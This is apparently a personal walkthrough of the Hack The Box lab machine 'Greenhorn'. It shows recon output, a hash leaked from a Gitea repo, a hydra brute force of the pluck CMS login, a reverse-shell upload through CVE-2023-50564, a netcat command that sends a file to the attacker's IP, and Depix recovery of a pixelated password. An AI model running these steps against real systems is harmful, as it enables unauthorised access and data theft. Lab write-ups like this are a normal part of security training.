Linux - Easy - Greenhorn

Created At: Updated At:
Keywords: linux

Recon

a28ee70ff143d27cd571ba19ad41fe2d.png

└──╼ $nmap -p- -A greenhorn.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 08:25 UTC
Nmap scan report for greenhorn.htb (10.129.178.31)
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_  256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-title: Welcome to GreenHorn ! - GreenHorn
|_Requested resource was http://greenhorn.htb/?file=welcome-to-greenhorn
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-generator: pluck 4.7.18
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-robots.txt: 2 disallowed entries 
|_/data/ /docs/
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=f8472946e7bb7aee; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=10zNRFqpKaYuRFW_9-ZNG2Lip3U6MTcyNDE0MjI5MzcwMzQ2NDk2OA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 20 Aug 2024 08:24:53 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=937130857acd1ee9; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=wEK50eH4jJ0NOpyY-HHhkxBO6DA6MTcyNDE0MjI5ODc4OTQ0NTMxNQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 20 Aug 2024 08:24:58 GMT
|_    Content-Length: 0
└──╼ $gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://greenhorn.htb  --append-domain -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://greenhorn.htb
[+] Method:          GET
[+] Threads:         200
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 3000000 / 3000001 (100.00%)
===============================================================
Finished
===============================================================

fc71f109772c46ed04e010ae7e715cd4.png

26dd95ad0b608209357f6eea62b3b11e.png

Most of the sites return 200, but then show:

ea0363dac56d95fd424ed2216d55efa3.png

Gitea

gitea is located on port 3000.
We can create an account and discover one repo on it.

62788c1fd204dadd47cdd17031486cd8.png

We can find one other person watching this repo, its admin.

b0a356878463687c9a8762dd741b8653.png

No CVE and no interesting files.

addon

What I found later, there is no need to use hydra as on gitea there is a file GreenHorn/data/settings/pass.php with a hash.

<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>

We can crack it and get password for pluck and not brute force with hydra.

CVE-2023-50564

Our main target seems to be:

2577a03afc7f1ed6eb5a157fd2ff6679.png

Pluck tells us its version and it has a CVE ready for us.
https://nvd.nist.gov/vuln/detail/CVE-2023-50564

All of the scripts require username and password, which we do not have.
We can “fix” this, running hydra

└──╼ $hydra -l admin -P /usr/share/wordlists/rockyou.txt greenhorn.htb http-post-form "/login.php:cont1=^PASS^&bogus=&submit=Log+in:F=Password incorrect."
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-08-20 09:45:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://greenhorn.htb:80/login.php:cont1=^PASS^&bogus=&submit=Log+in:F=Password incorrect.
[80][http-post-form] host: greenhorn.htb   login: admin   password: iloveyou1
1 of 1 target successfully completed, 1 valid password found

We are in, time to try out the CVE.
https://www.exploit-db.com/exploits/51592

ALL of the scripts did not work for me. I ended up uploading manually php-reverse-shell in a zip and it did work, so I do not understand why those scripts were even created.

User access

First, shell stablisation.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fg

Linpeas returns nothing of value.

pspy:

935104b5c1d409b8ac8ebc1304809d13.png

29863227e9dfdc1a559ea4f24fb698f6.png

After wasting too much time, Ive tried as a joke to login to user “junior” with the same password as earlier and it worked. Dissapointing.

Priv esc

In our home folder we have a file called “Using OpenVAS.pdf”.
We can send it back to us using netcat.

# attacker
nc -l -p 12345 > received_file.pdf

# victim
nc 10.10.14.81 12345 < file_to_send.pdf

42421d49c291be6eff800d1fd775e4dc.png

There has to be a way to get the distorted password back.

I’ve tried https://github.com/bishopfox/unredacter and it failed to do anything. I’ve tried getting data with strings command and hexedit, nothing. I’ve tried https://github.com/spipm/Depix and at first gave it input in .png format. Converiting to .ppm made it work.

pdfimages file.pdf file
python3 depix.py     -p /home/user/Desktop/file-000.ppm     -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png     -o /home/user/Desktop/output.png

d4492235583c2c150b19f38eb2b49e9a.png

password: sidefromsidetheothersidesidefromsidetheotherside

We are done here. One of the worst rooms I’ve done.